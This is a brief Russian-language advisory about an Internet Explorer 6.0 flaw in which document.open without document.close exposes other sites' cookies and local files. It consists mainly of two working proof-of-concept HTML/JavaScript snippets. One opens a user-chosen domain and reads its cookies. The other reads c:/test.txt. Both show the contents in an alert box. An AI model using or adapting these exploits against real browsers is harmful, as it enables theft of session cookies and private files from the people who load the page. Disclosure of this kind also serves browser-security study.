Простое открытие (document.open) документа без
его закрытия (document.close) позволяет атакующему
читать куки, читать локальные файлы,
подделывать адреса сайтов.

Уязвимая система: Internet Explorer 6.0

Примеры

Читаем произвольные куки:

<script>
function showcookie()
{
var domainname = document.forms.domainStuff.domainname.value; 
y = document.open("http://"+domainname, "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );

setTimeout('alert(y.document.cookie);y.document.close();',5000);

}

</script>

<form name="domainStuff">
<input type=text name="domainname" size=50>
<input type=button value="Click to view cookie"
onclick="javascript:showcookie()">

Читаем файл:

<script>

var y = document.open( "c:/test.txt", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );
setTimeout('alert(y.document.body.innerHTML);y.document.close();',1000);

</script>

Оставить мнение